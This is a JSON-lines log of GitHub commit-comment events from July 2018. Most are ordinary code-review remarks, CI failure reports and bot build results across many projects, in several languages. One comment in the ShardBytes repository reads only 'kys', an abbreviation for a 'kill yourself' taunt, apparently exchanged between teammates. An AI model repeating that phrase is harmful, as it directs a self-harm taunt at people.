{"id":"7981811044","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29746792,"position":5,"line":165,"path":"Source/Foundation/bsfCore/Animation/BsAnimationCurve.cpp","commit_id":"09c75b43855dba8fc2c338226309ed07f32155fc","created_at":"2018-07-18T09:41:49Z","updated_at":"2018-07-18T09:41:49Z","author_association":"CONTRIBUTOR","body":"Indeed"}},"created_at":"2018-07-18T09:41:49Z"}
{"id":"7981812279","type":"CommitCommentEvent","actor":{"login":"Andrewlllll"},"repo":{"name":"Andrewlllll/coding"},"payload":{"comment":{"id":29746795,"position":null,"line":null,"path":null,"commit_id":"d22bb1045d22bb4d4653100ce8faa26ce749f1a2","created_at":"2018-07-18T09:42:03Z","updated_at":"2018-07-18T09:42:03Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-18T09:42:03Z"}
{"id":"7981814209","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29746799,"position":54,"line":396,"path":"Source/Foundation/bsfUtility/Math/BsQuaternion.h","commit_id":"09c75b43855dba8fc2c338226309ed07f32155fc","created_at":"2018-07-18T09:42:25Z","updated_at":"2018-07-18T09:42:25Z","author_association":"CONTRIBUTOR","body":"Yep, just need to make `Quaternion` constructor constexpr as well."}},"created_at":"2018-07-18T09:42:25Z"}
{"id":"7981816557","type":"CommitCommentEvent","actor":{"login":"amandeepmittal"},"repo":{"name":"zeolearn/nodejs-text-tutorial"},"payload":{"comment":{"id":29746802,"position":null,"line":null,"path":null,"commit_id":"40b18a5222db2a8c87ee896631da4aa7f751112a","created_at":"2018-07-18T09:42:50Z","updated_at":"2018-07-18T09:42:50Z","author_association":"COLLABORATOR","body":"But authorization and authentication have to coupled here since we are using Passport + JWT and not our own authentication strategy. \r\n\r\nSpecifically, which example are you talking about? "}},"created_at":"2018-07-18T09:42:50Z"}
{"id":"7981816771","type":"CommitCommentEvent","actor":{"login":"Enet4"},"repo":{"name":"Enet4/byteorder-runtime"},"payload":{"comment":{"id":29746803,"position":102,"line":102,"path":"src/lib.rs","commit_id":"d1530b9f3cfbfbca3086e054420fdfa426c6f354","created_at":"2018-07-18T09:42:52Z","updated_at":"2018-07-18T09:42:52Z","author_association":"OWNER","body":"`byteorder` uses features as well, so I brought it in for consistency. Besides, the capability is already stable in modern compilers, [making the check unnecessary](https://github.com/BurntSushi/byteorder/commit/965103be61f7e1264c66a047029a0b026e113b47)."}},"created_at":"2018-07-18T09:42:52Z"}
{"id":"7981818023","type":"CommitCommentEvent","actor":{"login":"rasta-rocket"},"repo":{"name":"rahularora19911/cloud-stacks"},"payload":{"comment":{"id":29746804,"position":1,"line":1,"path":"openstack/base/lbaasv2/main.tf","commit_id":"5f1669ede76ef477103043ce49939fe9e6a38269","created_at":"2018-07-18T09:43:07Z","updated_at":"2018-07-18T09:43:07Z","author_association":"NONE","body":"lb_1 -> loadbalancer"}},"created_at":"2018-07-18T09:43:07Z"}
{"id":"7981818212","type":"CommitCommentEvent","actor":{"login":"surebart"},"repo":{"name":"railsgirls/railsgirls.github.io"},"payload":{"comment":{"id":29746805,"position":6,"line":275,"path":"_posts/2012-04-18-app.markdown","commit_id":"9c538693076da002e9fbe3deb6e436de018041f3","created_at":"2018-07-18T09:43:09Z","updated_at":"2018-07-18T09:43:09Z","author_association":"NONE","body":"CSS & layouts"}},"created_at":"2018-07-18T09:43:09Z"}
{"id":"7981818716","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29746809,"position":null,"line":null,"path":null,"commit_id":"80195d11ecb732829b5ab46108a750704371c036","created_at":"2018-07-18T09:43:15Z","updated_at":"2018-07-18T09:43:15Z","author_association":"CONTRIBUTOR","body":"https://travis-ci.org/void-linux/void-packages/jobs/405269086#L442\r\n````\r\nERROR: [trans] failed to download `musl-legacy-compat-0.3_1' package from `https://repo2.voidlinux.eu/current/musl': Not Found\r\n=> ERROR: Failed to install bootstrap packages!\r\n````\r\nAgain."}},"created_at":"2018-07-18T09:43:15Z"}
{"id":"7981819570","type":"CommitCommentEvent","actor":{"login":"rasta-rocket"},"repo":{"name":"rahularora19911/cloud-stacks"},"payload":{"comment":{"id":29746812,"position":8,"line":7,"path":"openstack/base/lbaasv2/main.tf","commit_id":"5f1669ede76ef477103043ce49939fe9e6a38269","created_at":"2018-07-18T09:43:24Z","updated_at":"2018-07-18T09:43:24Z","author_association":"NONE","body":"listener_1 -> listener"}},"created_at":"2018-07-18T09:43:24Z"}
{"id":"7981830837","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746832,"position":41,"line":41,"path":"index.html","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:45:27Z","updated_at":"2018-07-18T09:45:27Z","author_association":"NONE","body":"В хромі кнопка зїхала https://www.awesomescreenshot.com/image/3494796/2de746cafc5621ef4b558995ffeba612\r\nДля чого там absolute? "}},"created_at":"2018-07-18T09:45:27Z"}
{"id":"7981832831","type":"CommitCommentEvent","actor":{"login":"YannGmt"},"repo":{"name":"YannGmt/mpsrad"},"payload":{"comment":{"id":29746837,"position":17,"line":587,"path":"mpsrad/gui/gui.py","commit_id":"36496fea49d5c0accf230c05dcfb4a1aa84da636","created_at":"2018-07-18T09:45:50Z","updated_at":"2018-07-18T09:45:50Z","author_association":"OWNER","body":"I think all of these changes are abnormal, it seems that it is just a bad copy/paste from \"Ta1\" until \"=0.0\" because it cuts the \"self.measurements.spec\".\r\nI don't know what happened, it is weird just like the bad indentation you noticed yesterday but I'm quite sure that these lines are not in the gui file that runs in the lab. I will check it as soon as I go back there."}},"created_at":"2018-07-18T09:45:50Z"}
{"id":"7981833024","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29746839,"position":null,"line":null,"path":null,"commit_id":"fe8fb89cd52dfb4d678c5b8ba70c3c15c17b2b10","created_at":"2018-07-18T09:45:52Z","updated_at":"2018-07-18T09:45:52Z","author_association":"COLLABORATOR","body":"Thank you :)"}},"created_at":"2018-07-18T09:45:52Z"}
{"id":"7981836705","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29746864,"position":null,"line":null,"path":null,"commit_id":"e65f435dbb4736b192f70182dbef549fdd46f6b3","created_at":"2018-07-18T09:46:33Z","updated_at":"2018-07-18T09:46:33Z","author_association":"CONTRIBUTOR","body":"https://travis-ci.org/void-linux/void-packages/jobs/405276682#L442\r\n````\r\nERROR: [trans] failed to download `musl-legacy-compat-0.3_1' package from `https://repo2.voidlinux.eu/current/musl': Not Found\r\n=> ERROR: Failed to install bootstrap packages!\r\n````"}},"created_at":"2018-07-18T09:46:33Z"}
{"id":"7981841066","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746873,"position":48,"line":48,"path":"index.html","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:47:21Z","updated_at":"2018-07-18T09:47:21Z","author_association":"NONE","body":"Іконки не на одному рівні з текстом"}},"created_at":"2018-07-18T09:47:21Z"}
{"id":"7981841672","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29746874,"position":31,"line":93,"path":"app/views.py","commit_id":"a9913a26a24c6c9239955b113766af418536268c","created_at":"2018-07-18T09:47:28Z","updated_at":"2018-07-18T09:47:28Z","author_association":"NONE","body":"Если не нужно, лучше удалить, чем комментировать. Если надо то лучше потом дописать"}},"created_at":"2018-07-18T09:47:28Z"}
{"id":"7981844166","type":"CommitCommentEvent","actor":{"login":"ferrarimarco"},"repo":{"name":"jpoon/github-changelog-generator"},"payload":{"comment":{"id":29746876,"position":null,"line":null,"path":null,"commit_id":"3c2bb0769826e7f403ef1ee5c82b89fab9d20fe6","created_at":"2018-07-18T09:47:56Z","updated_at":"2018-07-18T09:47:56Z","author_association":"NONE","body":"Hi @jpoon \r\n\r\nI've pushed all the 1.15.pre.x tags earlier today :)"}},"created_at":"2018-07-18T09:47:56Z"}
{"id":"7981846291","type":"CommitCommentEvent","actor":{"login":"mbaldessari"},"repo":{"name":"mbaldessari/puppet-memcached"},"payload":{"comment":{"id":29746879,"position":null,"line":null,"path":null,"commit_id":"4aaa6feeacc14e70acc353c0c081189410f597e4","created_at":"2018-07-18T09:48:19Z","updated_at":"2018-07-18T09:48:19Z","author_association":"OWNER","body":"I have added a test in the PR https://github.com/saz/puppet-memcached/pull/99 let's take the discussion there?"}},"created_at":"2018-07-18T09:48:19Z"}
{"id":"7981847071","type":"CommitCommentEvent","actor":{"login":"alireza110110"},"repo":{"name":"CentroEPiaggio/Open-Automated-External-Defibrillator"},"payload":{"comment":{"id":29746881,"position":null,"line":null,"path":null,"commit_id":"8c38b951f6c5c12b0a837515b826485c3e9aacc8","created_at":"2018-07-18T09:48:27Z","updated_at":"2018-07-18T09:48:27Z","author_association":"NONE","body":"I really want the input and output  voltage and the current of the transformer or the number of coil in primery and secondary ....\r\n"}},"created_at":"2018-07-18T09:48:27Z"}
{"id":"7981849492","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29746886,"position":5,"line":8,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-18T09:48:54Z","updated_at":"2018-07-18T09:48:54Z","author_association":"OWNER","body":"Using a mapping to match the hash of the address with the hash of the password? \r\n` mapping (bytes32 => bytes32) ? `\r\n"}},"created_at":"2018-07-18T09:48:54Z"}
{"id":"7981850197","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746887,"position":55,"line":55,"path":"index.html","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:49:02Z","updated_at":"2018-07-18T09:49:02Z","author_association":"NONE","body":"Відступ якийсь занадто великий"}},"created_at":"2018-07-18T09:49:02Z"}
{"id":"7981857482","type":"CommitCommentEvent","actor":{"login":"rasta-rocket"},"repo":{"name":"rahularora19911/cloud-stacks"},"payload":{"comment":{"id":29746898,"position":4,"line":27,"path":"openstack/stack/nginx/v5/main.tf","commit_id":"5f1669ede76ef477103043ce49939fe9e6a38269","created_at":"2018-07-18T09:50:21Z","updated_at":"2018-07-18T09:50:21Z","author_association":"NONE","body":"it should work without bracket like /git/cloud-stacks/openstack/stack/nginx/v3/main.tf"}},"created_at":"2018-07-18T09:50:21Z"}
{"id":"7981859011","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29746900,"position":14,"line":83,"path":"app/views.py","commit_id":"a9913a26a24c6c9239955b113766af418536268c","created_at":"2018-07-18T09:50:38Z","updated_at":"2018-07-18T09:50:38Z","author_association":"NONE","body":"не ставь лишние пробелы"}},"created_at":"2018-07-18T09:50:38Z"}
{"id":"7981862768","type":"CommitCommentEvent","actor":{"login":"voiceinthedark"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29746914,"position":null,"line":null,"path":null,"commit_id":"78e07dce2ab5ed3a7df2b254b853a7cc7ad0b0e8","created_at":"2018-07-18T09:51:19Z","updated_at":"2018-07-18T09:51:19Z","author_association":"NONE","body":"The Loader should have been introduced before the AsyncTask...\r\nAnd now I am reading the documentation and it says the Loader has become deprecated as of API 28..."}},"created_at":"2018-07-18T09:51:19Z"}
{"id":"7981863655","type":"CommitCommentEvent","actor":{"login":"jpoon"},"repo":{"name":"jpoon/github-changelog-generator"},"payload":{"comment":{"id":29746916,"position":null,"line":null,"path":null,"commit_id":"3c2bb0769826e7f403ef1ee5c82b89fab9d20fe6","created_at":"2018-07-18T09:51:28Z","updated_at":"2018-07-18T09:51:28Z","author_association":"OWNER","body":"Sweet. Thanks for the heads up! We're using this over at vscodevim/vim so I'll make sure to switch it back over to using the more \"official\" images. "}},"created_at":"2018-07-18T09:51:28Z"}
{"id":"7981865557","type":"CommitCommentEvent","actor":{"login":"chuckbook"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":29746918,"position":null,"line":null,"path":null,"commit_id":"4b6bbbd134d88588319bf783233d9f46f5134d76","created_at":"2018-07-18T09:51:48Z","updated_at":"2018-07-18T09:51:48Z","author_association":"NONE","body":"Would it make sense to expose littlefs partition to allow fuse mounts?"}},"created_at":"2018-07-18T09:51:48Z"}
{"id":"7981866386","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746919,"position":1,"line":1,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:51:57Z","updated_at":"2018-07-18T09:51:57Z","author_association":"NONE","body":"Багато стилів прив'язані до конкретних елементів, тобто до тегів. Краще використовувати класи"}},"created_at":"2018-07-18T09:51:57Z"}
{"id":"7981873052","type":"CommitCommentEvent","actor":{"login":"timbgr"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29746934,"position":29,"line":29,"path":"lib/s390base.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-18T09:53:12Z","updated_at":"2018-07-18T09:53:12Z","author_association":"NONE","body":"I've tried this command \r\n`assert_script_run \"wget -r -l1 -H -t1 -nd -N -np -R'index.html*' -erobots=off $script_path\";`\r\nand it doesn't fetch the shell script :(\r\nYet the command worked on our stand-alone http server, this openQA built-in http server seems to be working in a different way. \r\n\r\nSo we need to figure out how to fetch scripts correctly. I have these solutions in mind:\r\n1) use file-by-file fetching (many lines of code if a testcase has many shell scripts)\r\n\r\n2) try to find a wget command parameters which allow to fetch all files at once\r\n\r\n3) put shell scripts in a tarball and fetch the tarball"}},"created_at":"2018-07-18T09:53:12Z"}
{"id":"7981877044","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29746941,"position":null,"line":null,"path":null,"commit_id":"7efb0b77221224303b7759730032829a2590cd64","created_at":"2018-07-18T09:53:56Z","updated_at":"2018-07-18T09:53:56Z","author_association":"NONE","body":"done"}},"created_at":"2018-07-18T09:53:56Z"}
{"id":"7981878153","type":"CommitCommentEvent","actor":{"login":"mn200"},"repo":{"name":"HOL-Theorem-Prover/HOL"},"payload":{"comment":{"id":29746946,"position":null,"line":null,"path":null,"commit_id":"01930d56ce7a31c10ff7f422a0cf535a8c502a59","created_at":"2018-07-18T09:54:09Z","updated_at":"2018-07-18T09:54:09Z","author_association":"MEMBER","body":"Hmm; I'm not sure I totally like the change here.  If the dubious behaviours are happening with `prove`, couldn't we adjust that instead, particularly as that is already “hacked about with” to support `--fast` mode and the like?"}},"created_at":"2018-07-18T09:54:09Z"}
{"id":"7981878536","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746947,"position":230,"line":230,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:54:13Z","updated_at":"2018-07-18T09:54:13Z","author_association":"NONE","body":"Багато стилів прив'язані до конкретних елементів, тобто до тегів. Краще використовувати класи"}},"created_at":"2018-07-18T09:54:13Z"}
{"id":"7981878781","type":"CommitCommentEvent","actor":{"login":"rasta-rocket"},"repo":{"name":"rahularora19911/cloud-stacks"},"payload":{"comment":{"id":29746949,"position":13,"line":53,"path":"openstack/base/lbaasv2/input.tf","commit_id":"5f1669ede76ef477103043ce49939fe9e6a38269","created_at":"2018-07-18T09:54:15Z","updated_at":"2018-07-18T09:54:15Z","author_association":"NONE","body":"hmmmm here I realize something that I didn't think before, because here the module expects a list of secgroup ID and not name (but we cannot predict ID of default  SG resource) so I was wondering if you try without default value ?"}},"created_at":"2018-07-18T09:54:15Z"}
{"id":"7981880240","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746956,"position":229,"line":229,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:54:30Z","updated_at":"2018-07-18T09:54:30Z","author_association":"NONE","body":"Багато стилів прив'язані до конкретних елементів, тобто до тегів. Краще використовувати класи"}},"created_at":"2018-07-18T09:54:30Z"}
{"id":"7981880925","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29746959,"position":21,"line":21,"path":"app/forms.py","commit_id":"35db39c4765af56aca8189c86d175b3646553497","created_at":"2018-07-18T09:54:38Z","updated_at":"2018-07-18T09:54:38Z","author_association":"NONE","body":"зачем в методе sing_up() переопределяешь метод clean()??????"}},"created_at":"2018-07-18T09:54:38Z"}
{"id":"7981882774","type":"CommitCommentEvent","actor":{"login":"dgaubert"},"repo":{"name":"CartoDB/Windshaft"},"payload":{"comment":{"id":29746963,"position":null,"line":null,"path":null,"commit_id":"a7199ca95bd4c16736e1e2c22b25b0412755da04","created_at":"2018-07-18T09:54:59Z","updated_at":"2018-07-18T09:54:59Z","author_association":"CONTRIBUTOR","body":"Before merging, please check that it fixes the issue in staging."}},"created_at":"2018-07-18T09:54:59Z"}
{"id":"7981884085","type":"CommitCommentEvent","actor":{"login":"Soulofdestiny"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29746964,"position":29,"line":29,"path":"lib/s390base.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-18T09:55:13Z","updated_at":"2018-07-18T09:55:13Z","author_association":"OWNER","body":"option 3 looks like the most stable solution for me, though it might produce extra work at your side"}},"created_at":"2018-07-18T09:55:13Z"}
{"id":"7981884912","type":"CommitCommentEvent","actor":{"login":"orhuntas"},"repo":{"name":"orhuntas/synchronousbuckconverter"},"payload":{"comment":{"id":29746965,"position":null,"line":null,"path":null,"commit_id":"7aea7d993b5f0d1669ae066bbc0b42701392b122","created_at":"2018-07-18T09:55:22Z","updated_at":"2018-07-18T09:55:22Z","author_association":"OWNER","body":"Umarım o güzel, güneşli günleri görebilirim hocam...\r\nTeşekkürler 😃 "}},"created_at":"2018-07-18T09:55:22Z"}
{"id":"7981886552","type":"CommitCommentEvent","actor":{"login":"lotheac"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29746982,"position":6,"line":46,"path":"src/tool_cb_hdr.c","commit_id":"a82372e0fb3aa3ce9ab27687c4d4a738a6ec9064","created_at":"2018-07-18T09:55:40Z","updated_at":"2018-07-18T09:55:40Z","author_association":"NONE","body":"you may want to revise this comment as CSI 21 m isn't \"bold-off\" but actually \"double-underline\"; see my comment at https://github.com/curl/curl/issues/2736#issuecomment-405874662"}},"created_at":"2018-07-18T09:55:40Z"}
{"id":"7981889598","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29746996,"position":351,"line":351,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:56:12Z","updated_at":"2018-07-18T09:56:12Z","author_association":"NONE","body":"Такі речі можна винести в окремий клас і не копіювати від елемента до елемента\r\ndisplay:flex;\r\nalign-items: center;\r\njustify-content: center;"}},"created_at":"2018-07-18T09:56:12Z"}
{"id":"7981891700","type":"CommitCommentEvent","actor":{"login":"Plasmoxy"},"repo":{"name":"ShardBytes/shardcore"},"payload":{"comment":{"id":29747005,"position":null,"line":null,"path":null,"commit_id":"fda1bfbfe9dd17f3478d10326b0720618256f794","created_at":"2018-07-18T09:56:35Z","updated_at":"2018-07-18T09:56:35Z","author_association":"MEMBER","body":"kys"}},"created_at":"2018-07-18T09:56:35Z"}
{"id":"7981892245","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747007,"position":393,"line":393,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:56:41Z","updated_at":"2018-07-18T09:56:41Z","author_association":"NONE","body":"Що робляти три крапки?\r\n\r\nНема закриття лапок"}},"created_at":"2018-07-18T09:56:41Z"}
{"id":"7981893957","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29747012,"position":45,"line":38,"path":"app/forms.py","commit_id":"35db39c4765af56aca8189c86d175b3646553497","created_at":"2018-07-18T09:56:59Z","updated_at":"2018-07-18T09:56:59Z","author_association":"NONE","body":"это не есть хорошо. не надо переопределять. ПЕРЕПИСАТЬ!"}},"created_at":"2018-07-18T09:56:59Z"}
{"id":"7981893980","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747013,"position":407,"line":407,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:56:59Z","updated_at":"2018-07-18T09:56:59Z","author_association":"NONE","body":"Не вистачає одної фігурної дужки"}},"created_at":"2018-07-18T09:56:59Z"}
{"id":"7981894762","type":"CommitCommentEvent","actor":{"login":"Plasmoxy"},"repo":{"name":"ShardBytes/shardcore"},"payload":{"comment":{"id":29747017,"position":null,"line":null,"path":null,"commit_id":"fda1bfbfe9dd17f3478d10326b0720618256f794","created_at":"2018-07-18T09:57:08Z","updated_at":"2018-07-18T09:57:08Z","author_association":"MEMBER","body":"boha filip šak človek už je scrollnuty keď mu vyskočí notifikacia >< :D"}},"created_at":"2018-07-18T09:57:08Z"}
{"id":"7981896223","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747023,"position":412,"line":412,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:57:23Z","updated_at":"2018-07-18T09:57:23Z","author_association":"NONE","body":"Те ж саме"}},"created_at":"2018-07-18T09:57:23Z"}
{"id":"7981900133","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29747030,"position":58,"line":46,"path":"app/forms.py","commit_id":"35db39c4765af56aca8189c86d175b3646553497","created_at":"2018-07-18T09:58:06Z","updated_at":"2018-07-18T09:58:06Z","author_association":"NONE","body":"вьюшка не должна быть в форме. APIView возвращает response. В django эти мзанимается views.py. Удаляй"}},"created_at":"2018-07-18T09:58:06Z"}
{"id":"7981903431","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747043,"position":397,"line":397,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T09:58:41Z","updated_at":"2018-07-18T09:58:41Z","author_association":"NONE","body":"достатньо @media only screen and (max-width: 600px), не знаю для чого тут resolution"}},"created_at":"2018-07-18T09:58:41Z"}
{"id":"7981908169","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29747047,"position":1,"line":1,"path":"app/tests.py","commit_id":"35db39c4765af56aca8189c86d175b3646553497","created_at":"2018-07-18T09:59:32Z","updated_at":"2018-07-18T09:59:32Z","author_association":"NONE","body":"from django.test import TestCase, Client"}},"created_at":"2018-07-18T09:59:32Z"}
{"id":"7986097581","type":"CommitCommentEvent","actor":{"login":"Guzaboo"},"repo":{"name":"Guzaboo/lombardo"},"payload":{"comment":{"id":29757624,"position":75,"line":75,"path":"lombardo.js","commit_id":"7c839784c9c09c0720b046b51dae3328c6f02c24","created_at":"2018-07-19T00:00:07Z","updated_at":"2018-07-19T00:00:07Z","author_association":"OWNER","body":"Submit a pull request."}},"created_at":"2018-07-19T00:00:07Z"}
{"id":"7986105113","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29757646,"position":null,"line":null,"path":null,"commit_id":"f3991bd0301c2b88c540fcf1c5098bbc5315f98b","created_at":"2018-07-19T00:02:33Z","updated_at":"2018-07-19T00:02:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-811](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-811).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-811-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T00:02:33Z"}
{"id":"7986110354","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"prettier/prettier"},"payload":{"comment":{"id":29757662,"position":null,"line":null,"path":null,"commit_id":"52f8b5c13c06d71df15a09763f3d266d21dba959","created_at":"2018-07-19T00:04:21Z","updated_at":"2018-07-19T00:04:21Z","author_association":"CONTRIBUTOR","body":"👍 thanks"}},"created_at":"2018-07-19T00:04:21Z"}
{"id":"7986113045","type":"CommitCommentEvent","actor":{"login":"airspeedswift"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29757673,"position":28,"line":28,"path":"include/swift/SILOptimizer/Analysis/PassManagerVerifierAnalysis.h","commit_id":"4ba6a505639a5d9bcdd7bc1a4bdfb0c8131d6a67","created_at":"2018-07-19T00:05:16Z","updated_at":"2018-07-19T00:05:16Z","author_association":"MEMBER","body":"@gottesmm this introduced a warning in no-assertions builds."}},"created_at":"2018-07-19T00:05:16Z"}
{"id":"7986114098","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29757675,"position":null,"line":null,"path":null,"commit_id":"e9e0852a19c0e60f9052be0b5bb292d6295dcb8f","created_at":"2018-07-19T00:05:39Z","updated_at":"2018-07-19T00:05:39Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-812](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-812).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-812-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-19T00:05:39Z"}
{"id":"7986121839","type":"CommitCommentEvent","actor":{"login":"MeteoricDragon"},"repo":{"name":"Interkarma/daggerfall-unity"},"payload":{"comment":{"id":29757691,"position":null,"line":null,"path":null,"commit_id":"5b3ce1befee9d1811c8454020b36826a4ac802bc","created_at":"2018-07-19T00:08:29Z","updated_at":"2018-07-19T00:08:29Z","author_association":"CONTRIBUTOR","body":"I'm guessing this control will be as useless as the Detail slider?"}},"created_at":"2018-07-19T00:08:29Z"}
{"id":"7986122553","type":"CommitCommentEvent","actor":{"login":"upsuper"},"repo":{"name":"xiph/rav1e"},"payload":{"comment":{"id":29757694,"position":4,"line":939,"path":"src/lib.rs","commit_id":"1280decb43cf0963f5979f567c6f3f69aa925a98","created_at":"2018-07-19T00:08:45Z","updated_at":"2018-07-19T00:08:45Z","author_association":"NONE","body":"You can use `unimplemented!(\"...\");` instead, which should be more clear in semantics although they are effectively the same."}},"created_at":"2018-07-19T00:08:45Z"}
{"id":"7986122888","type":"CommitCommentEvent","actor":{"login":"Raboo"},"repo":{"name":"ceph/ceph-container"},"payload":{"comment":{"id":29757695,"position":null,"line":null,"path":null,"commit_id":"722e147b408b7f747e91daadf2419b9a6921aaf6","created_at":"2018-07-19T00:08:52Z","updated_at":"2018-07-19T00:08:52Z","author_association":"CONTRIBUTOR","body":"When will this make it into the stable releases? nfs-ganesha v2.5 doesn't exist in download.ceph.com. So buildning Mimic fails for the stable releases."}},"created_at":"2018-07-19T00:08:52Z"}
{"id":"7986123645","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29757701,"position":null,"line":null,"path":null,"commit_id":"3049276ae76d350b62a841abc11d20e053c2db67","created_at":"2018-07-19T00:09:08Z","updated_at":"2018-07-19T00:09:08Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (rraustad) - i386-Windows-7-VisualStudio-14: OK (2930 of 2930 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-19T00:09:08Z"}
